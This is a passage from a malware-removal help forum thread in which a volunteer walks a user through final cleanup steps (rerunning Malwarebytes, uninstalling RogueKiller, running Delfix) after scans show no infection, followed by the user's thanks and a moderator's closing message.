No infection found.
Successfully Submitted MAPS Report
Successfully Submitted Heartbeat Report
Microsoft Windows Malicious Software Removal Tool Finished On Mon Mar 27 00:26:35 2017

Return code: 0 (0x0)

MBResults.txt

AdwCleaner[C2].txt

mrt.log

[kevinf80]

Malwarebytes log is showing "No Action Taken by User" can you run Malwarebytes again and remove the found entries, after that unless there are any remaining issues or concerns we can clean up......

Uninstall RogueKiller - http://www.askvg.com/how-to-completely-uninstall-remove-a-software-program-in-windows-without-using-3rd-party-software/ Next, Download "Delfix by Xplode" and save it to your desktop. Or use the following if first link is down: "Delfix link mirror" If your security program alerts to Delfix either, accept the alert or turn your security off. Double Click to start the program. If you are using Vista or higher, please right-click and choose run as administrator Make Sure the following items are checked:   Remove disinfection tools <----- this will remove tools we have used. Purge System Restore <--- this will remove all previous and possibly exploited restore points, a new point relative to system status at present will be created. Reset system settings <--- this will reset any system settings back to default that were changed either by us during cleansing or malware/infection Now click on "Run" and wait patiently until the tool has completed. The tool will create a log when it has completed. We don't need you to post this. Any remnant files/logs from tools we have used can be deleted… Next, Read the following links to fully understand PC Security and Best Practices, you may find them useful.... Answers to Common Security Questions and best Practices Do I need a Registry Cleaner? Take care and surf safe Kevin...

Thank you,

Kevin...

[Zeelu]

Hey Kevin! Sorry I couldn't write back earlier, just wanted to say you were a great help! Thank you so much. My PC is working absolutely fine now .

[kevinf80]

Thank you for those kind words, it was a pleasure to work with you...

Regards,

Kevin...

[AdvancedSetup]

Glad we could help. :)If you need this topic reopened, please send a Private Message to any one of the moderating team members. Please include a link to this thread with your request. This applies only to the originator of this thread.Other members who need assistance please start your own topic in a new thread. Thanks!